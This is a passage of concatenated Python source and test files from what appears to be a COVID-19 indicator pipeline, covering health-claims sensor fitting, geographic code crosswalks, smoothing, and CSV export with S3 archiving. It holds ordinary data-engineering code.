elif geo == "msa":
data_frame = gmpr.replace_geocode(data, "fips", "msa")
elif geo == "hrr":
data_frame = gmpr.replace_geocode(data, "fips", "hrr")
self.unique_geo_ids = pd.unique(data_frame[geo])
data_frame.set_index([geo, Config.DATE_COL],inplace=True)
# for each location, fill in all missing dates with 0 values
multiindex = pd.MultiIndex.from_product((self.unique_geo_ids, self.fit_dates),
names=[geo, Config.DATE_COL])
assert (len(multiindex) <= (Constants.MAX_GEO[geo] * len(self.fit_dates))
), "more loc-date pairs than maximum number of geographies x number of dates"
# fill dataframe with missing dates using 0
data_frame = data_frame.reindex(multiindex, fill_value=0)
data_frame.fillna(0, inplace=True)
return data_frame
def update_sensor(self,
denom_filepath,
covid_filepath,
outpath,
staticpath):
"""Generate sensor values, and write to csv format.
Args:
denom_filepath: path to the aggregated denominator data
covid_filepath: path to the aggregated covid data
outpath: output path for the csv results
staticpath: path for the static geographic files
"""
self.shift_dates()
final_sensor_idxs = (self.burn_in_dates >= self.startdate) & (self.burn_in_dates <= self.enddate)
# load data
base_geo = "fips"
data = load_combined_data(denom_filepath, covid_filepath, self.dropdate, base_geo)
data.reset_index(inplace=True)
data_frame = self.geo_reindex(data)
# handle if we need to adjust by weekday
wd_params = Weekday.get_params(data_frame) if self.weekday else None
# run sensor fitting code (maybe in parallel)
sensor_rates = {}
sensor_se = {}
sensor_include = {}
if not self.parallel:
for geo_id, sub_data in data_frame.groupby(level=0):
sub_data.reset_index(level=0,inplace=True)
if self.weekday:
sub_data = Weekday.calc_adjustment(wd_params, sub_data)
res = CHCSensor.fit(sub_data, self.burnindate, geo_id)
res = pd.DataFrame(res)
sensor_rates[geo_id] = np.array(res.loc[final_sensor_idxs,"rate"])
sensor_se[geo_id] = np.array(res.loc[final_sensor_idxs,"se"])
sensor_include[geo_id] = np.array(res.loc[final_sensor_idxs,"incl"])
else:
n_cpu = min(10, cpu_count())
logging.debug(f"starting pool with {n_cpu} workers")
with Pool(n_cpu) as pool:
pool_results = []
for geo_id, sub_data in data_frame.groupby(level=0,as_index=False):
sub_data.reset_index(level=0, inplace=True)
if self.weekday:
sub_data = Weekday.calc_adjustment(wd_params, sub_data)
pool_results.append(
pool.apply_async(
CHCSensor.fit, args=(sub_data, self.burnindate, geo_id,),
)
)
pool_results = [proc.get() for proc in pool_results]
for res in pool_results:
geo_id = res["geo_id"]
res = pd.DataFrame(res)
sensor_rates[geo_id] = np.array(res.loc[final_sensor_idxs, "rate"])
sensor_se[geo_id] = np.array(res.loc[final_sensor_idxs, "se"])
sensor_include[geo_id] = np.array(res.loc[final_sensor_idxs, "incl"])
unique_geo_ids = list(sensor_rates.keys())
output_dict = {
"rates": sensor_rates,
"se": sensor_se,
"dates": self.sensor_dates,
"geo_ids": unique_geo_ids,
"geo_level": self.geo,
"include": sensor_include,
}
# write out results
for signal in self.updated_signal_names:
write_to_csv(output_dict, self.se, signal, outpath)
logging.debug(f"wrote files to {outpath}")
params = read_params()
'''
arch_diff = S3ArchiveDiffer(
params["cache_dir"],
params["export_dir"],
params["bucket_name"], "chc",
params["aws_credentials"])
arch_diff.update_cache()
_, common_diffs, new_files = arch_diff.diff_exports()
# Archive changed and new files only
to_archive = [f for f, diff in common_diffs.items() if diff is not None]
to_archive += new_files
_, fails = arch_diff.archive_exports(to_archive)
print(fails)
# Filter existing exports to exclude those that failed to archive
succ_common_diffs = {f: diff for f, diff in common_diffs.items() if f not in fails}
arch_diff.filter_exports(succ_common_diffs)
# Report failures: someone should probably look at them
for exported_file in fails:
print(f"Failed to archive '{exported_file}'")
'''
```
#### File: changehc/tests/test_load_data.py
```python
import pytest
# third party
from delphi_utils import read_params
import pandas as pd
# first party
from delphi_changehc.config import Config, Constants
from delphi_changehc.load_data import *
CONFIG = Config()
CONSTANTS = Constants()
PARAMS = read_params()
COVID_FILEPATH = PARAMS["input_covid_file"]
DENOM_FILEPATH = PARAMS["input_denom_file"]
DROP_DATE = pd.to_datetime(PARAMS["drop_date"])
class TestLoadData:
denom_data = load_denom_data(DENOM_FILEPATH, DROP_DATE, "fips")
covid_data = load_covid_data(COVID_FILEPATH, DROP_DATE, "fips")
combined_data = load_combined_data(DENOM_FILEPATH, COVID_FILEPATH, DROP_DATE,
"fips")
def test_base_unit(self):
with pytest.raises(AssertionError):
load_denom_data(DENOM_FILEPATH, DROP_DATE, "foo")
with pytest.raises(AssertionError):
load_denom_data("test_data/20200101_foo.dat", DROP_DATE, "fips")
with pytest.raises(AssertionError):
load_covid_data(COVID_FILEPATH, DROP_DATE, "foo")
with pytest.raises(AssertionError):
load_covid_data("test_data/20200101_foo.dat", DROP_DATE, "fips")
with pytest.raises(AssertionError):
load_combined_data(DENOM_FILEPATH, COVID_FILEPATH, DROP_DATE, "foo")
def test_denom_columns(self):
assert "fips" in self.denom_data.index.names
assert "date" in self.denom_data.index.names
expected_denom_columns = ["Denominator"]
for col in expected_denom_columns:
assert col in self.denom_data.columns
assert len(set(self.denom_data.columns) - set(expected_denom_columns)) == 0
def test_claims_columns(self):
assert "fips" in self.covid_data.index.names
assert "date" in self.covid_data.index.names
expected_covid_columns = ["COVID"]
for col in expected_covid_columns:
assert col in self.covid_data.columns
assert len(set(self.covid_data.columns) - set(expected_covid_columns)) == 0
def test_combined_columns(self):
assert "fips" in self.combined_data.index.names
assert "date" in self.combined_data.index.names
expected_combined_columns = ["num", "den"]
for col in expected_combined_columns:
assert col in self.combined_data.columns
assert len(
set(self.combined_data.columns) - set(expected_combined_columns)) == 0
def test_edge_values(self):
for data in [self.denom_data,
self.covid_data,
self.combined_data]:
assert data.index.get_level_values('date').max() >= Config.FIRST_DATA_DATE
assert data.index.get_level_values('date').min() < DROP_DATE
def test_fips_values(self):
for data in [self.denom_data,
self.covid_data,
self.combined_data]:
assert (
len(data.index.get_level_values(
'fips').unique()) <= CONSTANTS.NUM_COUNTIES
)
def test_combined_fips_values(self):
assert self.combined_data.isna().sum().sum() == 0
sum_fips_num = (
self.covid_data["COVID"].sum()
)
sum_fips_den = (
self.denom_data["Denominator"].sum()
)
assert self.combined_data["num"].sum() == sum_fips_num
assert self.combined_data["den"].sum() == sum_fips_den
```
#### File: claims_hosp/delphi_claims_hosp/smooth.py
```python
import numpy as np
from .config import Config
def left_gauss_linear(arr, bandwidth=Config.SMOOTHER_BANDWIDTH):
"""
Smooth the y-values using a local linear left Gaussian filter.
Args:
arr: one dimensional signal to smooth.
bandwidth: smoothing bandwidth (in terms of variance)
Returns: a smoothed 1D signal.
"""
n_rows = len(arr)
out_arr = np.zeros_like(arr)
X = np.vstack([np.ones(n_rows), np.arange(n_rows)]).T
for idx in range(n_rows):
weights = np.exp(-((np.arange(idx + 1) - idx) ** 2) / bandwidth)
XwX = np.dot(X[: (idx + 1), :].T * weights, X[: (idx + 1), :])
Xwy = np.dot(X[: (idx + 1), :].T * weights, arr[: (idx + 1)].reshape(-1, 1))
try:
beta = np.linalg.solve(XwX, Xwy)
out_arr[idx] = np.dot(X[: (idx + 1), :], beta)[-1]
except np.linalg.LinAlgError:
out_arr[idx] = np.nan
return out_arr
```
#### File: _delphi_utils_python/delphi_utils/utils.py
```python
from json import load
from os.path import exists
from shutil import copyfile
def read_params():
"""Reads a file named 'params.json' in the current working directory.
If the file does not exist, it copies the file 'params.json.template' to
'param.json' and then reads the file.
"""
if not exists("params.json"):
copyfile("params.json.template", "params.json")
with open("params.json", "r") as json_file:
return load(json_file)
```
#### File: _delphi_utils_python/tests/test_geomap.py
```python
from delphi_utils.geomap import GeoMapper
import pytest
import pandas as pd
import numpy as np
class TestGeoMapper:
fips_data = pd.DataFrame(
{
"fips": ["01123", "02340", "98633", "18181"],
"date": [pd.Timestamp("2018-01-01")] * 4,
"count": [2, 0, 20, 10021],
"total": [4, 0, 400, 100001],
}
)
fips_data_2 = pd.DataFrame(
{
"fips": ["01123", "02340", "02002", "18633", "18181"],
"date": [pd.Timestamp("2018-01-01")] * 5,
"count": [2, 1, 20, np.nan, 10021],
"total": [4, 1, 400, np.nan, 100001],
}
)
fips_data_3 = pd.DataFrame(
{
"fips": ["48059", "48253", "48441", "72003", "72005", "10999"],
"date": [pd.Timestamp("2018-01-01")] * 3 + [pd.Timestamp("2018-01-03")] * 3,
"count": [1, 2, 3, 4, 8, 5],
"total": [2, 4, 7, 11, 100, 10],
}
)
fips_data_4 = pd.DataFrame(
{
"fips": ["01123", "48253", "72003", "18181"],
"date": [pd.Timestamp("2018-01-01")] * 4,
"count": [2, 1, np.nan, 10021],
"total": [4, 1, np.nan, 100001],
}
)
fips_data_5 = pd.DataFrame(
{
"fips": [1123, 48253, 72003, 18181],
"date": [pd.Timestamp("2018-01-01")] * 4,
"count": [2, 1, np.nan, 10021],
"total": [4, 1, np.nan, 100001],
}
)
zip_data = pd.DataFrame(
{
"zip": ["45140", "95616", "95618"] * 2,
"date": [pd.Timestamp("2018-01-01")] * 3 + [pd.Timestamp("2018-01-03")] * 3,
"count": [99, 345, 456, 100, 344, 442],
}
)
zip_data["total"] = zip_data["count"] * 2
jan_month = pd.bdate_range("2018-01-01", "2018-02-01")
mega_data = pd.concat(
(
pd.DataFrame(
{
"fips": ["01001"] * len(jan_month),
"date": jan_month,
"count": np.arange(len(jan_month)),
"visits": np.arange(len(jan_month)),
}
),
pd.DataFrame(
{
"fips": ["01002"] * len(jan_month),
"date": jan_month,
"count": np.arange(len(jan_month)),
"visits": 2 * np.arange(len(jan_month)),
}
),
)
)
mega_data_2 = pd.concat(
(
pd.DataFrame(
{
"fips": ["01001"] * len(jan_month),
"date": jan_month,
"count": np.arange(len(jan_month)),
"_thr_col_roll": np.arange(len(jan_month)),
}
),
pd.DataFrame(
{
"fips": [11001] * len(jan_month),
"date": jan_month,
"count": np.arange(len(jan_month)),
"_thr_col_roll": np.arange(len(jan_month)),
}
),
)
)
jhu_uid_data = pd.DataFrame(
{
"jhu_uid": [
84048315,
84048137,
84013299,
84013299,
84070002,
84000013,
84090002,
],
"date": [pd.Timestamp("2018-01-01")] * 3
+ [pd.Timestamp("2018-01-03")] * 3
+ [pd.Timestamp("2018-01-01")],
"count": [1, 2, 3, 4, 8, 5, 20],
"total": [2, 4, 7, 11, 100, 10, 40],
}
)
# jhu_big_data = pd.read_csv("test_dir/small_deaths.csv")
# Loading tests updated 8/26
def test_crosswalks(self):
# These tests ensure that the one-to-many crosswalks have properly normalized weights
gmpr = GeoMapper()
# FIPS -> HRR is allowed to be an incomplete mapping, since only a fraction of a FIPS
# code can not belong to an HRR
cw = gmpr._load_crosswalk(from_code="fips", to_code="hrr")
assert (
cw.groupby("fips")["weight"].sum().round(5).ge(0.95).all()
) # some weight discrepancy is fine for HRR
cw = gmpr._load_crosswalk(from_code="fips", to_code="zip")
assert cw.groupby("fips")["weight"].sum().round(5).eq(1.0).all()
cw = gmpr._load_crosswalk(from_code="jhu_uid", to_code="fips")
assert cw.groupby("jhu_uid")["weight"].sum().round(5).eq(1.0).all()
cw = gmpr._load_crosswalk(from_code="zip", to_code="fips")
assert cw.groupby("zip")["weight"].sum().round(5).eq(1.0).all()
# weight discrepancy is fine for MSA, for the same reasons as HRR
# cw = gmpr.load_crosswalk(from_code="zip", to_code="msa")
# assert cw.groupby("zip")["weight"].sum().round(5).eq(1.0).all()
cw = gmpr._load_crosswalk(from_code="zip", to_code="state")
assert cw.groupby("zip")["weight"].sum().round(5).eq(1.0).all()
def test_load_zip_fips_table(self):
gmpr = GeoMapper()
fips_data = gmpr._load_crosswalk(from_code="zip", to_code="fips")
assert set(fips_data.columns) == set(["zip", "fips", "weight"])
assert pd.api.types.is_string_dtype(fips_data.zip)
assert pd.api.types.is_string_dtype(fips_data.fips)
assert pd.api.types.is_float_dtype(fips_data.weight)
def test_load_state_table(self):
gmpr = GeoMapper()
state_data = gmpr._load_crosswalk(from_code="state", to_code="state")
assert tuple(state_data.columns) == ("state_code", "state_id", "state_name")
assert state_data.shape[0] == 60
def test_load_fips_msa_table(self):
gmpr = GeoMapper()
msa_data = gmpr._load_crosswalk(from_code="fips", to_code="msa")
assert tuple(msa_data.columns) == ("fips", "msa")
def test_load_jhu_uid_fips_table(self):
gmpr = GeoMapper()
jhu_data = gmpr._load_crosswalk(from_code="jhu_uid", to_code="fips")
assert (jhu_data.groupby("jhu_uid").sum() == 1).all()[0]
def test_load_zip_hrr_table(self):
gmpr = GeoMapper()
zip_data = gmpr._load_crosswalk(from_code="zip", to_code="hrr")
assert pd.api.types.is_string_dtype(zip_data["zip"])
assert pd.api.types.is_string_dtype(zip_data["hrr"])
def test_convert_fips_to_state_code(self):
gmpr = GeoMapper()
new_data = gmpr.convert_fips_to_state_code(self.fips_data)
assert new_data["state_code"].dtype == "O"
assert new_data.loc[1, "state_code"] == new_data.loc[1, "fips"][:2]
def test_fips_to_state_code(self):
gmpr = GeoMapper()
new_data = gmpr.fips_to_state_code(self.fips_data_3)
assert np.allclose(new_data["count"].sum(), self.fips_data_3["count"].sum())
def test_convert_state_code_to_state_id(self):
gmpr = GeoMapper()
new_data = gmpr.convert_fips_to_state_code(self.fips_data)
new_data = gmpr.convert_state_code_to_state_id(new_data)
assert new_data["state_id"].isnull()[2]
assert new_data["state_id"][3] == "in"
assert len(pd.unique(new_data["state_id"])) == 4
def test_fips_to_state_id(self):
gmpr = GeoMapper()
new_data = gmpr.fips_to_state_id(self.fips_data_2)
assert new_data["state_id"][2] == "in"
assert new_data.shape[0] == 3
assert new_data["count"].sum() == self.fips_data_2["count"].sum()
def test_fips_to_msa(self):
gmpr = GeoMapper()
new_data = gmpr.fips_to_msa(self.fips_data_3)
assert new_data.shape[0] == 2
assert new_data["msa"][0] == "10180"
new_data = gmpr.fips_to_msa(self.fips_data_3, create_mega=True)
assert new_data[["count"]].sum()[0] == self.fips_data_3["count"].sum()
def test_zip_to_fips(self):
gmpr = GeoMapper()
new_data = gmpr.zip_to_fips(self.zip_data)
assert new_data.shape[0] == 10
assert (
new_data[["count", "total"]].sum() - self.zip_data[["count", "total"]].sum()
).sum() < 1e-3
def test_megacounty(self):
gmpr = GeoMapper()
new_data = gmpr.fips_to_megacounty(self.mega_data, 6, 50)
assert (
new_data[["count", "visits"]].sum()
- self.mega_data[["count", "visits"]].sum()
).sum() < 1e-3
with pytest.raises(ValueError):
new_data = gmpr.megacounty_creation(
self.mega_data_2, 6, 50, thr_col="_thr_col_roll"
)
new_data = gmpr.fips_to_megacounty(
self.mega_data, 6, 50, count_cols=["count", "visits"]
)
assert (
new_data[["count"]].sum() - self.mega_data[["count"]].sum()
).sum() < 1e-3
def test_zip_to_hrr(self):
gmpr = GeoMapper()
new_data = gmpr.zip_to_hrr(self.zip_data)
assert len(pd.unique(new_data["hrr"])) == 2
assert np.allclose(
new_data[["count", "total"]].sum(), self.zip_data[["count", "total"]].sum()
)
def test_jhu_uid_to_fips(self):
gmpr = GeoMapper()
new_data = gmpr.jhu_uid_to_fips(self.jhu_uid_data)
assert not (new_data["fips"].astype(int) > 90000).any()
assert new_data["total"].sum() == self.jhu_uid_data["total"].sum()
def test_fips_to_zip(self):
gmpr = GeoMapper()
new_data = gmpr.fips_to_zip(self.fips_data_4)
assert new_data["count"].sum() == self.fips_data_4["count"].sum()
def test_fips_to_hrr(self):
gmpr = GeoMapper()
data = gmpr.convert_fips_to_hrr(self.fips_data_3)
ind = self.fips_data_3["fips"].isin(data["fips"])
data = self.fips_data_3[ind]
new_data = gmpr.fips_to_hrr(self.fips_data_3)
assert new_data.shape == (2, 4)
assert new_data["count"].sum() == data["count"].sum()
def test_zip_to_msa(self):
gmpr = GeoMapper()
new_data = gmpr.zip_to_msa(self.zip_data)
assert new_data["msa"][2] == "46700"
assert new_data.shape[0] == 6
assert np.allclose(new_data["count"].sum(), self.zip_data["count"].sum())
def test_zip_to_state_code(self):
gmpr = GeoMapper()
new_data = gmpr.zip_to_state_code(self.zip_data)
assert new_data.shape[0] == 4
assert np.allclose(new_data["count"].sum(), self.zip_data["count"].sum())
def test_zip_to_state_id(self):
gmpr = GeoMapper()
new_data = gmpr.zip_to_state_id(self.zip_data)
assert new_data.shape[0] == 4
assert np.allclose(new_data["count"].sum(), self.zip_data["count"].sum())
def test_add_population_column(self):
gmpr = GeoMapper()
new_data = gmpr.add_population_column(self.fips_data_3, "fips")
assert new_data.shape == (5, 5)
new_data = gmpr.add_population_column(self.zip_data, "zip")
assert new_data.shape == (6, 5)
with pytest.raises(ValueError):
new_data = gmpr.add_population_column(self.zip_data, "hrr")
new_data = gmpr.add_population_column(self.fips_data_5, "fips")
assert new_data.shape == (4, 5)
def test_add_geocode(self):
gmpr = GeoMapper()
# fips -> zip
new_data = gmpr.fips_to_zip(self.fips_data_3)
new_data2 = gmpr.replace_geocode(self.fips_data_3, "fips", "zip")
assert new_data.equals(new_data2)
# fips -> hrr
new_data = gmpr.fips_to_hrr(self.fips_data_3)
new_data2 = gmpr.replace_geocode(self.fips_data_3, "fips", "hrr")
new_data2 = new_data2[new_data.columns]
assert np.allclose(
new_data[["count", "total"]].values, new_data2[["count", "total"]].values
)
# fips -> msa
new_data = gmpr.fips_to_msa(self.fips_data_3)
new_data2 = gmpr.replace_geocode(self.fips_data_3, "fips", "msa")
new_data2 = new_data2[new_data.columns]
assert np.allclose(
new_data[["count", "total"]].values, new_data2[["count", "total"]].values
)
# fips -> state_id
new_data = gmpr.fips_to_state_id(self.fips_data_4)
new_data2 = gmpr.replace_geocode(self.fips_data_4, "fips", "state_id")
new_data2 = new_data2[new_data.columns]
assert np.allclose(
new_data[["count", "total"]].values, new_data2[["count", "total"]].values
)
# fips -> state_code
new_data = gmpr.fips_to_state_code(self.fips_data_4)
new_data2 = gmpr.replace_geocode(self.fips_data_4, "fips", "state_code")
new_data2 = new_data2[new_data.columns]
assert np.allclose(
new_data[["count", "total"]].values, new_data2[["count", "total"]].values
)
# fips -> state_code (again, mostly to cover the test case of when fips
# codes aren't all strings)
new_data = gmpr.fips_to_state_code(self.fips_data_5)
new_data2 = gmpr.replace_geocode(self.fips_data_5, "fips", "state_code")
new_data2 = new_data2[new_data.columns]
assert np.allclose(
new_data[["count", "total"]].values, new_data2[["count", "total"]].values
)
# zip -> fips
new_data = gmpr.zip_to_fips(self.zip_data)
new_data2 = gmpr.replace_geocode(self.zip_data, "zip", "fips")
new_data2 = new_data2[new_data.columns]
assert new_data.equals(new_data2)
# zip -> hrr
new_data = gmpr.zip_to_hrr(self.zip_data)
new_data2 = gmpr.replace_geocode(self.zip_data, "zip", "hrr")
new_data2 = new_data2[new_data.columns]
assert new_data.equals(new_data2)
# zip -> msa
new_data = gmpr.zip_to_msa(self.zip_data)
new_data2 = gmpr.replace_geocode(self.zip_data, "zip", "msa")
new_data2 = new_data2[new_data.columns]
assert np.allclose(
new_data[["count", "total"]].values, new_data2[["count", "total"]].values
)
# zip -> state_id
new_data = gmpr.zip_to_state_id(self.zip_data)
new_data2 = gmpr.replace_geocode(self.zip_data, "zip", "state_id")
new_data2 = new_data2[new_data.columns]
assert np.allclose(
new_data[["count", "total"]].values, new_data2[["count", "total"]].values
)
# zip -> state_code
new_data = gmpr.zip_to_state_code(self.zip_data)
new_data2 = gmpr.replace_geocode(self.zip_data, "zip", "state_code")
new_data2 = new_data2[new_data.columns]
assert np.allclose(
new_data[["count", "total"]].values, new_data2[["count", "total"]].values
)
# jhu_uid -> fips
new_data = gmpr.jhu_uid_to_fips(self.jhu_uid_data)
new_data2 = gmpr.replace_geocode(self.jhu_uid_data, "jhu_uid", "fips")
new_data2 = new_data2[new_data.columns]
assert np.allclose(
new_data[["count", "total"]].values, new_data2[["count", "total"]].values
)
# state_code -> hhs
new_data = gmpr.add_geocode(self.zip_data, "zip", "state_code")
new_data2 = gmpr.add_geocode(new_data, "state_code", "hhs_region_number")
assert new_data2["hhs_region_number"].unique().size == 2
# state_name -> state_id
new_data = gmpr.replace_geocode(self.zip_data, "zip", "state_name")
new_data2 = gmpr.add_geocode(new_data, "state_name", "state_id")
assert new_data2.shape == (4, 5)
new_data2 = gmpr.replace_geocode(new_data, "state_name", "state_id", new_col="abbr")
assert "abbr" in new_data2.columns
# fips -> nation
new_data = gmpr.replace_geocode(self.fips_data_5, "fips", "nation", new_col="NATION")
assert new_data.equals(
pd.DataFrame().from_dict(
{
"date": {0: pd.Timestamp("2018-01-01 00:00:00")},
"NATION": {0: "us"},
"count": {0: 10024.0},
"total": {0: 100006.0},
}
)
)
# zip -> nation
new_data = gmpr.replace_geocode(self.zip_data, "zip", "nation")
assert new_data.equals(
pd.DataFrame().from_dict(
{
"date": {
0: pd.Timestamp("2018-01-01"),
1: pd.Timestamp("2018-01-03"),
},
"nation": {0: "us", 1: "us"},
"count": {0: 900, 1: 886},
"total": {0: 1800, 1: 1772},
}
)
)
# hrr -> nation
with pytest.raises(ValueError):
new_data = gmpr.replace_geocode(self.zip_data, "zip", "hrr")
new_data2 = gmpr.replace_geocode(new_data, "hrr", "nation")
# fips -> hrr (dropna=True/False check)
assert not gmpr.add_geocode(self.fips_data_3, "fips", "hrr").isna().any().any()
assert gmpr.add_geocode(self.fips_data_3, "fips", "hrr", dropna=False).isna().any().any()
# fips -> zip (date_col=None chech)
new_data = gmpr.replace_geocode(self.fips_data_5.drop(columns=["date"]), "fips", "hrr", date_col=None)
assert new_data.equals(
pd.DataFrame().from_dict(
{
'hrr': {0: '1', 1: '183', 2: '184', 3: '382', 4: '7'},
'count': {0: 1.772347174163783, 1: 7157.392403522299, 2: 2863.607596477701, 3: 1.0, 4: 0.22765282583621685},
'total': {0: 3.544694348327566, 1: 71424.64801363471, 2: 28576.35198636529, 3: 1.0, 4: 0.4553056516724337}
}
)
)
```
#### File: emr_hosp/delphi_emr_hosp/run.py
```python
import logging
from datetime import datetime, timedelta
from pathlib import Path
# third party
from delphi_utils import read_params
# first party
from .update_sensor import EMRHospSensorUpdator
def run_module():
"""Run the delphi_emr_hosp module.
"""
params = read_params()
logging.basicConfig(level=logging.DEBUG)
## get end date from input file
# the filenames are expected to be in the format:
# EMR: "ICUE_CMB_INPATIENT_DDMMYYYY.csv.gz"
# CLAIMS: "EDI_AGG_INPATIENT_DDMMYYYY_HHMM{timezone}.csv.gz"
if params["drop_date"] is None:
dropdate_emr = datetime.strptime(
Path(params["input_emr_file"]).name.split("_")[3].split(".")[0], "%d%m%Y"
)
dropdate_claims = datetime.strptime(
Path(params["input_claims_file"]).name.split("_")[3], "%d%m%Y"
)
assert dropdate_emr == dropdate_claims, "different drop dates for data steams"
dropdate_dt = dropdate_claims
else:
dropdate_dt = datetime.strptime(params["drop_date"], "%Y-%m-%d")
dropdate = str(dropdate_dt.date())
# range of estimates to produce
n_backfill_days = params["n_backfill_days"] # produce estimates for n_backfill_days
n_waiting_days = params["n_waiting_days"] # most recent n_waiting_days won't be est
enddate_dt = dropdate_dt - timedelta(days=n_waiting_days)
startdate_dt = enddate_dt - timedelta(days=n_backfill_days)
enddate = str(enddate_dt.date())
startdate = str(startdate_dt.date())
# now allow manual overrides
if params["end_date"] is not None:
enddate = params["end_date"]
if params["start_date"] is not None:
startdate = params['start_date']
logging.info("first sensor date:\t%s", startdate)
logging.info("last sensor date:\t%s", enddate)
logging.info("drop date:\t\t%s", dropdate)
logging.info("n_backfill_days:\t%s", n_backfill_days)
logging.info("n_waiting_days:\t%s", n_waiting_days)
## print out other vars
logging.info("geos:\t\t\t%s", params["geos"])
logging.info("outpath:\t\t%s", params["export_dir"])
logging.info("parallel:\t\t%s", params["parallel"])
logging.info("weekday:\t\t%s", params["weekday"])
logging.info("se:\t\t\t%s", params["se"])
## start generating
for geo in params["geos"]:
for weekday in params["weekday"]:
if weekday:
logging.info("starting %s, weekday adj", geo)
else:
logging.info("starting %s, no adj", geo)
su_inst = EMRHospSensorUpdator(
startdate,
enddate,
dropdate,
geo,
params["parallel"],
weekday,
params["se"]
)
su_inst.update_sensor(
params["input_emr_file"],
params["input_claims_file"],
params["export_dir"],
params["static_file_dir"]
)
logging.info("finished %s", geo)
logging.info("finished all")
```
#### File: google_health/delphi_google_health/export.py
```python
import numpy as np
import pandas as pd
from .smooth import smoothed_values_by_geo_id
RESCALE_VAL = 4000 / 100
def export_csv(
df: pd.DataFrame, geo_name: str, sensor: str, smooth: bool, receiving_dir: str
) -> None:
"""Export data set in format expected for injestion by the API
Note that the output values will be multiplied by the value RESCALE_VAL
defined in this file.
Parameters
----------
df: pd.DataFrame
data frame with columns "geo_id", "timestamp", and "val"
geo_name: str
name of the geographic region, such as "state" or "hrr"
sensor: str
name of the sensor; only used for naming the output file
smooth: bool
should the signal in "val" be smoothed?
receiving_dir: str
path to location where the output CSV files to be uploaded should be stored
"""
df = df.copy()
if smooth:
df["val"] = smoothed_values_by_geo_id(df)
df["val"] /= RESCALE_VAL
df["se"] = np.nan
df["sample_size"] = np.nan
for date in df["timestamp"].unique():
date_short = date.replace("-", "")
export_fn = f"{date_short}_{geo_name}_{sensor}.csv"
df[df["timestamp"] == date][["geo_id", "val", "se", "sample_size"]].to_csv(
f"{receiving_dir}/{export_fn}",
index=False,
na_rep="NA",
float_format="%.8f",
)
```
#### File: google_health/delphi_google_health/run.py
```python
import datetime
import logging
from delphi_utils import (
read_params,
S3ArchiveDiffer
)
import covidcast
from .pull_api import GoogleHealthTrends, get_counts_states, get_counts_dma
from .map_values import derived_counts_from_dma
from .export import export_csv
from .constants import SIGNALS, RAW, SMOOTHED, MSA, HRR, STATE, DMA
def run_module():
"""Main function run when calling the module.
Inputs parameters from the file 'params.json' and produces output data in
the directory defined by the `export_dir` (should be "receiving" expect for
testing purposes).
"""
# read parameters
params = read_params()
ght_key = params["ght_key"]
start_date = params["start_date"]
end_date = params["end_date"]
static_dir = params["static_file_dir"]
export_dir = params["export_dir"]
data_dir = params["data_dir"]
wip_signal = params["wip_signal"]
cache_dir = params["cache_dir"]
arch_diff = S3ArchiveDiffer(
cache_dir, export_dir,
params["bucket_name"], "ght",
params["aws_credentials"])
arch_diff.update_cache()
print(arch_diff)
# if missing start_date, set to today (GMT) minus 5 days
if start_date == "":
now = datetime.datetime.now(datetime.timezone.utc)
start_date = (now - datetime.timedelta(days=4)).strftime("%Y-%m-%d")
# if missing start_date, set to today (GMT) minus 5 days
if start_date == "":
now = datetime.datetime.now(datetime.timezone.utc)
start_date = (now - datetime.timedelta(days=4)).strftime("%Y-%m-%d")
# if missing end_date, set to today (GMT) minus 5 days
if end_date == "":
now = datetime.datetime.now(datetime.timezone.utc)
end_date = (now - datetime.timedelta(days=4)).strftime("%Y-%m-%d")
# Turn on basic logging messages (level INFO)
logging.basicConfig(format="%(levelname)s:%(message)s", level=logging.INFO)
logging.info("Creating data from %s through %s.", start_date, end_date)
# setup class to handle API calls
ght = GoogleHealthTrends(ght_key=ght_key)
# read data frame version of the data
df_state = get_counts_states(
ght, start_date, end_date, static_dir=static_dir, data_dir=data_dir
)
df_dma = get_counts_dma(
ght, start_date, end_date, static_dir=static_dir, data_dir=data_dir
)
df_hrr, df_msa = derived_counts_from_dma(df_dma, static_dir=static_dir)
signal_names = add_prefix(SIGNALS, wip_signal, prefix="wip_")
for signal in signal_names:
if signal.endswith(SMOOTHED):
# export each geographic region, with both smoothed and unsmoothed data
export_csv(df_state, STATE, signal, smooth=True, receiving_dir=export_dir)
export_csv(df_dma, DMA, signal, smooth=True, receiving_dir=export_dir)
export_csv(df_hrr, HRR, signal, smooth=True, receiving_dir=export_dir)
export_csv(df_msa, MSA, signal, smooth=True, receiving_dir=export_dir)
elif signal.endswith(RAW):
export_csv(df_state, STATE, signal, smooth=False, receiving_dir=export_dir)
export_csv(df_dma, DMA, signal, smooth=False, receiving_dir=export_dir)
export_csv(df_hrr, HRR, signal, smooth=False, receiving_dir=export_dir)
export_csv(df_msa, MSA, signal, smooth=False, receiving_dir=export_dir)
# Diff exports, and make incremental versions
_, common_diffs, new_files = arch_diff.diff_exports()
# Archive changed and new files only
to_archive = [f for f, diff in common_diffs.items() if diff is not None]
to_archive += new_files
_, fails = arch_diff.archive_exports(to_archive)
# Filter existing exports to exclude those that failed to archive
succ_common_diffs = {f: diff for f, diff in common_diffs.items() if f not in fails}
arch_diff.filter_exports(succ_common_diffs)
# Report failures: someone should probably look at them
for exported_file in fails:
print(f"Failed to archive '{exported_file}'")
def add_prefix(signal_names, wip_signal, prefix):
"""Adds prefix to signal if there is a WIP signal
Parameters
----------
signal_names: List[str]
Names of signals to be exported
prefix : 'wip_'
prefix for new/non public signals
wip_signal : List[str] or bool
a list of wip signals: [], OR
all signals in the registry: True OR
only signals that have never been published: False
Returns
-------
List of signal names
wip/non wip signals for further computation
"""
if wip_signal is True:
return [prefix + signal for signal in signal_names]
if isinstance(wip_signal, list):
make_wip = set(wip_signal)
return [
(prefix if signal in make_wip else "") + signal
for signal in signal_names
]
if wip_signal in {False, ""}:
return [
signal if public_signal(signal)
else prefix + signal
for signal in signal_names
]
raise ValueError("Supply True | False or '' or [] | list()")
def public_signal(signal_):
"""Checks if the signal name is already public using COVIDcast
Parameters
----------
signal_ : str
Name of the signal
Returns
-------
bool
True if the signal is present
False if the signal is not present
"""
epidata_df = covidcast.metadata()
for index in range(len(epidata_df)):
if epidata_df['signal'][index] == signal_:
return True
return False
```
#### File: google_health/tests/test_smooth.py
```python
import pytest
from os.path import join
import numpy as np
import pandas as pd
from delphi_google_health.smooth import smoothed_values_by_geo_id, _left_gauss_linear
class TestSmoothedValues:
def test_smooth(self):
df = pd.DataFrame(
{
"geo_id": ["a", "a", "a", "a", "b", "b", "b"],
"timestamp": [
"2020-02-01",
"2020-02-02",
"2020-02-03",
"2020-02-04",
"2020-02-01",
"2020-02-02",
"2020-02-03",
],
"val": np.array([0, 1, 2, 2, 1, 3, 7]),
}
)
smoothed = smoothed_values_by_geo_id(df)
